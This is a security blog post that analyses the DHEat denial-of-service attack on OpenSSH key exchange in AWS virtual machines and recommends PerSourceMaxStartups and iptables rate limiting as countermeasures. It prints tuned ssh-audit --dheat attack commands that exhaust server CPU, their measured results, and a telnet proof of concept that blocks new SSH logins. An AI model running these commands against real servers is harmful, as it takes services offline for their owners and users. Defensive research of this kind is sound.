Positron Security

An Analysis of the DHEat DoS Against SSH in Cloud Environments

April 23, 2024

The DHEat denial-of-service vulnerability involves sending a large number of Diffie-Hellman (DH) public keys to a peer, causing it to perform many unnecessary modular exponentiations and wasting CPU resources (in fact, the attacker can simply send random numbers instead of real DH keys to avoid incurring the computational penalty themselves). Because the DH handshake occurs before authentication in many network protocols (such as SSH), the attack can be conducted anonymously. And interestingly, as the size of the DH modulus increases, the brute-force security of the key exchange also increases, but so does the susceptibility to the DHEat attack since larger (and more expensive) modular exponentiation is required.

This attack seems to have first been discussed in a 2002 paper by Raymond and Stiglic [1], but gained renewed attention nearly two decades later in 2021 when Szilárd Pfeiffer released a proof-of-concept tool to attack SSH and HTTPS services [2][3]. This issue was assigned CVE-2002-20001 (note that, despite the name, this CVE was created in 2021).

In this article, I analyze the impact of the DHEat attack against SSH services in cloud environments. Using a custom implementation of the attack (available in ssh-audit v3.2.0), I will show that it can easily consume all CPU resources in Amazon Web Services (AWS) virtual machines running the Amazon Linux 2023 image with default settings when low-latency links exist between a source and target. In fact, only 11 KB/s of bandwidth is needed to exhaust the t3.micro instance, and just 15 KB/s overwhelms the m7i.large instance!

Default OpenSSH Countermeasures

Before getting into the attack results, it is worth explaining the default countermeasures that the OpenSSH implementation includes: the MaxStartups directive. This directive limits the number of pre-authentication connections that OpenSSH will allow before invoking a throttling mechanism. The default value of this directive is “10:30:100”, which means that 10 pre-authentication connections are always allowed. Upon the 11th connection, there is a 30% chance it will be refused. The probability of refusal increases linearly to 100% once 100 connections are reached.

During testing it was found that this default can partially protect SSH services in the cloud when the attacker has a relatively high-latency network link to the target (such as conducting the attack from the public Internet with many hops in between). However, this default was found to be fully ineffective when the attacker has a low-latency link (including, but not limited to, using another AWS account as the source). In fact, there was no reasonable MaxStartups setting found that can thwart the DHEat attack in this scenario. An in-depth analysis of this finding can be found in the “DHEat Countermeasures: MaxStartups Tuning” section, later in this article.

Attack Results Against AWS Instances

For all tests below, a fully updated Amazon Linux 2023 image is used with no changes to the defaults (unless otherwise noted).

Target: m7i.large instance + diffie-hellman-group16-sha512 key exchange

Let’s start with the m7i.large instance: a fairly capable general-purpose VM instance whose two vCPUs feature “Up to 3.2 GHz 4th Generation Intel Xeon Scalable processor (Sapphire Rapids 8488C)” (as per AWS’s description). A few minutes after booting the VM, the average idle time over a 60-second period was (unsurprisingly) found to be 99.86%.

Now we’ll run the DHEat attack from the public Internet (over a relatively high-latency link) against the server’s diffie-hellman-group16-sha512 key exchange (which uses a 4096-bit modulus):

$ ssh-audit --dheat=8:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 41; Compl. conns/sec: 41; Bytes sent/sec: 11.2KB; DH kex/sec: 41

The above command makes ssh-audit run 8 concurrent threads and target the diffie-hellman-group16-sha512 key exchange while sending only 4 bytes as its value of e (normally the result of the modular exponentiation g^x mod p, but in this case, just a short random number which tricks the server into thinking a real DH key was sent). In response, the server performs one modular exponentiation (g^y mod p) and returns the result. ssh-audit ignores this, closes the connection, re-opens another, and repeats the process as quickly as possible until manually terminated.

While letting the above command run in the background, we run a custom tool (idle_watcher.py) on the target to collect CPU idle metrics over a trailing 60-second period and compute the average:

$ python3 idle_watcher.py
Running iostat and monitoring CPU idle times for 65 seconds.
Complete!
Average idle time: 64.90%

Well, our first attempt was rather unimpressive. We were only able to increase CPU load by 99.86% - 64.90% = 34.96%. Let’s see what happens to the 60-second average idle time as we increase the number of threads from 16 to 90 in increments of 16:

$ ssh-audit --dheat=16:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 61; Compl. conns/sec: 51; Bytes sent/sec: 16.7KB; DH kex/sec: 51
---
Average idle time: 52.63%

$ ssh-audit --dheat=32:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 85; Compl. conns/sec: 57; Bytes sent/sec: 23.0KB; DH kex/sec: 57
---
Average idle time: 46.96%

$ ssh-audit --dheat=48:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 97; Compl. conns/sec: 59; Bytes sent/sec: 26.5KB; DH kex/sec: 59
---
Average idle time: 52.02%

$ ssh-audit --dheat=64:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 16884; Compl. conns/sec: 57; Bytes sent/sec: 28.1KB; DH kex/sec: 57
---
Average idle time: 54.48%

$ ssh-audit --dheat=80:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 102; Compl. conns/sec: 51; Bytes sent/sec: 27.7KB; DH kex/sec: 51
---
Average idle time: 58.22%

$ ssh-audit --dheat=96:diffie-hellman-group16-sha512:4 [target]
TCP SYNs/sec: 107; Compl. conns/sec: 48; Bytes sent/sec: 29.1KB; DH kex/sec: 48
---
Average idle time: 52.47%

Looks like our best results (49.96% idle) come from using 32 threads and sending 23 KB/s. But what if this strain is the result of accepting 57 connections per second and not because of the modular exponentiation? Using ssh-audit’s --conn-rate-test feature, let’s use 32 threads to create at most 57 connections per second without triggering the exponentiation:

$ ssh-audit --conn-rate-test=32:57 [target]
TCP SYNs/sec: 81.6; Compl. conns/sec: 56.4

After this runs for 60 seconds, idle_watcher.py reports the average idle time as 79.55%. This implies that the new connection handling accounted for 20.31% of CPU load (= 99.86% baseline idle time - 79.55% idle time during connection rate test), and the modular exponentiation resulted in 32.59% CPU load (= 99.86% baseline idle time - 46.96% new connection plus modular exponentiation idle time - 20.31% new connection idle time).

We did succeed in wasting half of the target’s CPU resources, but fell very much short of overwhelming the server completely. The high communication latency caused sockets to remain in the pool of unauthenticated connections (governed by the MaxStartups directive) for a longer period of time, hence more of our incoming connections were rejected. However, in a lower-latency scenario, each socket would enter and exit the pool faster, allowing a greater number of new connections per second before throttling is triggered.

Now let’s see what happens when we run the attack from a very low-latency network source. In this case, we will spin up an m7i.2xlarge AWS instance in another account to use as the attacking source (chosen due to its high network performance), then use the target’s public IPv4 address. This would model a real-world scenario where an attacker is external to the target from both a network and organizational perspective. Through experimentation (omitted for brevity), I found that using only 4 threads results in 0.00% idle time on the target!:

$ ssh-audit --dheat=4:diffie-hellman-group16-sha512:4 [public IPv4 address]
TCP SYNs/sec: 112; Compl. conns/sec: 112; Bytes sent/sec: 30.5KB; DH kex/sec: 112
---
Average idle time: 0.00%

And now, using the same number of threads, let’s see how much idle time results from just creating 112 new connections per second:

$ ssh-audit --conn-rate-test=4:112 [public IPv4 address]
TCP SYNs/sec: 110.7; Compl. conns/sec: 110.7
---
Average idle time: 56.03%

The above results show that 43.83% CPU load was caused by new connection handling, thus 56.03% CPU load was caused by modular exponentiation. These results are quite the improvement over what we got when using a high-latency source (previously, we could only get the average idle time down to 47%; now we’ve gotten it down to 0%!).

Overall, effect of this DoS attack against a 4096-bit diffie-hellman-group16-sha512 key exchange algorithm is dramatic: with just 31 KB/s of application protocol traffic (not accounting for IP and TCP packet overhead), we’re able to completely exhaust all the vCPUs of a fairly capable cloud VM!

Target: m7i.large instance + diffie-hellman-group18-sha512 key exchange

Now let’s target the diffie-hellman-group18-sha512 key exchange on the same VM. This algorithm features an 8192-bit modulus, which provides greater security against brute force attacks, but causes higher strain when computing modular exponentiation.

From an m7i.2xlarge instance in another AWS account:

$ ssh-audit --dheat=4:diffie-hellman-group18-sha512:4 [public IPv4 address]
TCP SYNs/sec: 55; Compl. conns/sec: 55; Bytes sent/sec: 15.1KB; DH kex/sec: 55
---
Average idle time: 0.01%

Compared to the 4096-bit diffie-hellman-group16-sha512 algorithm, when targeting this 8192-bit diffie-hellman-group18-sha512 algorithm, we’ve effectively consumed both vCPUs with about half of the connections per second (55 vs 112) and half of the bandwidth (15 KB/s vs 31 KB/s)! Impressive.

Target: m7i.large + curve25519-sha256 key exchange

The curve25519-sha256 key exchange was the default in OpenSSH from v6.5 until v8.9. It is a very fast algorithm based on Elliptical Curve Diffie-Hellman combined with the transparently-developed Curve25519 parameters. This, too, can be targeted by the DHEat attack.

From an m7i.2xlarge instance in another AWS account:

$ ssh-audit --dheat=4:curve25519-sha256 [public IPv4 address]
TCP SYNs/sec: 159; Compl. conns/sec: 159; Bytes sent/sec: 45.5KB; DH kex/sec: 159
---
Average idle time: 0.02%

And just to make sure that we didn’t achieve this effect solely from the high rate of connections:

$ ssh-audit --conn-rate-test=4:159 [public IPv4 address]
TCP SYNs/sec: 157.0; Compl. conns/sec: 157.0
---
Average idle time: 49.29%

Targeting curve25519-sha256 requires about 3 times more bandwidth than diffie-hellman-group18-sha512 (46 KB/s vs 15 KB/s), but this is still very reasonable. And it may be possible to further optimize the attack against this key exchange in the future.

Target: m7i.large + sntrup761x25519-sha512@openssh.com key exchange

The relatively new sntrup761x25519-sha512@openssh.com key exchange algorithm is rather interesting, as it wraps the standard X25519 key exchange with the Streamlined NTRU Prime key exchange to provide high resistance to quantum computing attacks. This algorithm became the default in OpenSSH in v9.0 [4], though for some reason it is disabled in the latest revision of Amazon Linux 2023 (as of April 2024). By editing the /etc/crypto-policies/back-ends/opensshserver.config file, this can be turned on to enable testing.

From an m7i.2xlarge instance in another AWS account:

$ ssh-audit --dheat=4:sntrup761x25519-sha512@openssh.com
TCP SYNs/sec: 109; Compl. conns/sec: 109; Bytes sent/sec: 156.5KB; DH kex/sec: 109
---
Average idle time: 0.03%

As you can see, it requires about 10 times higher bandwidth to exhaust the vCPUs in comparison to the diffie-hellman-group18-sha512 key exchange (157 KB/s vs 15 KB/s). Note, however, that ssh-audit’s implementation for this key exchange is very much unoptimized as of this writing; it may be possible to reduce the necessary bandwidth through future improvements.

Target: t3.micro + diffie-hellman-group18-sha512 key exchange

AWS’s t3.micro VM instance is a popular choice for small workloads. As per the AWS documentation, each of its two vCPUs are “Up to 3.1 GHz Intel Xeon Scalable processor (Skylake 8175M or Cascade Lake 8259CL)”. Since this has more modest resources than the m7i.large instance, we would expect less connections per second / bandwidth needed to overwhelm it.

From an m7i.2xlarge instance in another AWS account:

$ ssh-audit --dheat=3:diffie-hellman-group18-sha512:4 [public IPv4 address]
TCP SYNs/sec: 40; Compl. conns/sec: 40; Bytes sent/sec: 10.9KB; DH kex/sec: 40
---
Average idle time: 0.01%

For comparison, the m7i.large instance became flooded at 55 connections per second / 15 KB/s bandwidth against the same key exchange. Hence, the t3.micro instance is roughly 28% easier to overload with respect to bandwidth.

Target: c7a.8xlarge + diffie-hellman-group18-sha512 key exchange

Ok, now here’s where things get interesting. Let’s see what happens when we target a powerful compute-optimized instance: the c7a.8xlarge, which features 32 vCPUs. As per the AWS documentation, it uses “Up to 3.7 GHz 4th generation AMD EPYC processors (AMD EPYC 9R14)”.

From an m7i.2xlarge instance in another AWS account:

$ ssh-audit --dheat=56:diffie-hellman-group18-sha512:4 [public IPv4 address]
TCP SYNs/sec: 3465; Compl. conns/sec: 1151; Bytes sent/sec: 937.5KB; DH kex/sec: 1150
---
Average idle time: 0.92%

Let’s see how much load we add just from the new connections:

$ ssh-audit --conn-rate-test=56:1151 [public IPv4 address]
TCP SYNs/sec: 2105.8; Compl. conns/sec: 1134.4
---
Average idle time: 74.81%

Amazing! We caused over 99% load across 32 high-performance vCPUs! Of this, roughly 74% was the result of superfluous modular exponentiation, with the remaining 25% load coming from new connection handling. And all that with under 1MB/s of network traffic!

DHEat Countermeasures: MaxStartups Tuning

As witnessed above, OpenSSH’s default MaxStartups setting (“10:30:100”) is only effective when a relatively high-latency connection is used. When we used a low-latency link (a VM instance in another AWS account), we were easily able to bypass this default. Let’s now take a look at the effects of strengthening the setting to see if low-latency connections can still flood the target.

As we saw before, the m7i.large instance becomes flooded when it receives 55 connections per second / 15 KB/s directed at the diffie-hellman-group18-sha512 key exchange from a low-latency source with the default MaxStartups setting. Let’s update the setting to “10:30:20”, which would cause between 30% and 100% connection drops when 11 to 20 pre-authentication connections are formed:

$ ssh-audit --dheat=4:diffie-hellman-group18-sha512:4 [public IPv4 address]
TCP SYNs/sec: 54; Compl. conns/sec: 54; Bytes sent/sec: 14.7KB; DH kex/sec: 54
---
Average idle time: 0.00%

Completely ineffective. Ok, let’s try “10:100:10”; this would block all connections once 10 is reached:

[command remains constant for all tests and will be omitted]
TCP SYNs/sec: 54; Compl. conns/sec: 54; Bytes sent/sec: 14.8KB; DH kex/sec: 54
---
Average idle time: 0.01%

Another failure. How about “5:100:5”?:

TCP SYNs/sec: 161; Compl. conns/sec: 53; Bytes sent/sec: 43.6KB; DH kex/sec: 53
---
Average idle time: 0.00%

Wow! I expected to at least begin to see the effects of the tighter restriction. But nothing changed! Ok, lets reject all incoming requests after just 2 unauthenticated sockets are opened (“2:100:2”):

TCP SYNs/sec: 5322; Compl. conns/sec: 31; Bytes sent/sec: 1.4MB; DH kex/sec: 31
---
Average idle time: 39.61%

Ok, we finally see an effect. But this is bad news: not only did we need to reduce the number of allowed pre-authentication connections down to an unreasonable size, but we were still able to eat 60% of the CPU regardless!

Continuing down this path is all but pointless from a practical perspective, but just for completeness, let’s try the absolutely most restrictive setting possible (“1:100:1”):

TCP SYNs/sec: 7262; Compl. conns/sec: 0; Bytes sent/sec: 1.9MB; DH kex/sec: 0
---
Average idle time: 87.90%

Now its official: the MaxStartups setting cannot be reasonably used to prevent a denial-of-service condition. When the extreme “1:100:1” setting is used, the DHEat attack is prevented, but another trivial DoS attack becomes possible: an attacker can simply open one (1) connection with the server and leave it idle to prevent ALL new logins. Proof-of-concept:

$ telnet target-host 22 # Attacker creates one connection, then lets it idle.
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
SSH-2.0-OpenSSH_8.7

$ telnet target-host 22 # A new legitimate connection is attempted...
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
Exceeded MaxStartups
Connection closed by foreign host.

There is, however, one last configuration change we can try with OpenSSH: the PerSourceMaxStartups setting. This option was added in OpenSSH v8.5 (released in March 2021)[5], and further restricts pre-authentication connections coming from a particular source (vs. MaxStartups, which defines a global limit).

Let’s reset MaxStartups to the default, then set PerSourceMaxStartups to 2. This would allow up to 2 pre-authentication connections at a time from any one source IP:

TCP SYNs/sec: 1841; Compl. conns/sec: 41; Bytes sent/sec: 498.2KB; DH kex/sec: 41
---
Average idle time: 46.22%

Well, that’s a partial fix. We’re still able to consume more than 50% of the vCPUs, though.

Lastly, let’s see what happens when we set PerSourceMaxStartups to 1:

TCP SYNs/sec: 2469; Compl. conns/sec: 0; Bytes sent/sec: 668.0KB; DH kex/sec: 0
---
Average idle time: 96.05%

That’s a great result! The only down side here would be in some use cases that involve a burst of new connections from a single source; some of those connections would be improperly rejected. In fact, performing a standard audit with ssh-audit results in failures in the group key exchange enumeration phase, yielding incomplete findings.

DHEat Countermeasures: TCP Connection Throttling

Another viable countermeasure to the attack would be TCP connection throttling at the kernel level. The following Linux commands will restrict incoming SSH connections to at most 10 connections every 10 seconds per IPv4/IPv6 source address:

# iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --set
# iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 10 --hitcount 10 -j DROP

# ip6tables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --set
# ip6tables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 10 --hitcount 10 -j DROP

This can very effectively neutralize the attack, while still allowing bursts of legitimate connections. Observe the result on an m7i.large instance with this rate limiting in place:

$ ssh-audit --dheat=4:diffie-hellman-group18-sha512:4 [public IPv4 address]
TCP SYNs/sec: 51; Compl. conns/sec: 0; Bytes sent/sec: 60 bytes; DH kex/sec: 0
---
Average idle time: 98.96%

Success!

Conclusion

The DHEat attack remains viable against most SSH installations, as default settings are inadequate at deflecting it. Very little bandwidth is needed to cause a dramatic effect on targets, including those with a high degree of resources. Hence, SSH services should be blocked from external access whenever possible. Furthermore, connection rate limiting should always be applied regardless of network segmentation, as per the central principles of Zero Trust.

There are two options for implementing this rate limiting:

Setting the OpenSSH PerSourceMaxStartups directive to 1 will provide full protection, but may result in some client failures if a burst of new connections is made (this has been observed to happen when conducting a standard audit with ssh-audit).
Using iptables/ip6tables at the kernel-level also provides full protection, while still being flexible enough to allow bursts of new connections.

References

[1] Raymond, Jean-Francois and Stiglic, Anton, “Security Issues in the Diffie-Hellman Key Agreement Protocol”, IEEE Transactions on Information Theory 22, pg. 12, 2002, <https://www.researchgate.net/publication/2401745_Security_Issues_in_the_Diffie-Hellman_Key_Agreement_Protocol>.
[2] https://gitlab.com/dheatattack/dheater
[3] https://www.reddit.com/r/netsec/comments/qdoosy/server_overload_by_enforcing_dhe_key_exchange/
[4] https://www.openssh.com/txt/release-9.0
[5] https://www.openssh.com/txt/release-8.5

Blog

An Analysis of the DHEat DoS Against SSH in Cloud Environments

Default OpenSSH Countermeasures

Attack Results Against AWS Instances

Target: m7i.large instance + diffie-hellman-group16-sha512 key exchange

Target: m7i.large instance + diffie-hellman-group18-sha512 key exchange

Target: m7i.large + curve25519-sha256 key exchange

Target: m7i.large + sntrup761x25519-sha512@openssh.com key exchange

Target: t3.micro + diffie-hellman-group18-sha512 key exchange

Target: c7a.8xlarge + diffie-hellman-group18-sha512 key exchange

DHEat Countermeasures: MaxStartups Tuning

DHEat Countermeasures: TCP Connection Throttling

Conclusion

Further Reading

References

Blog Archives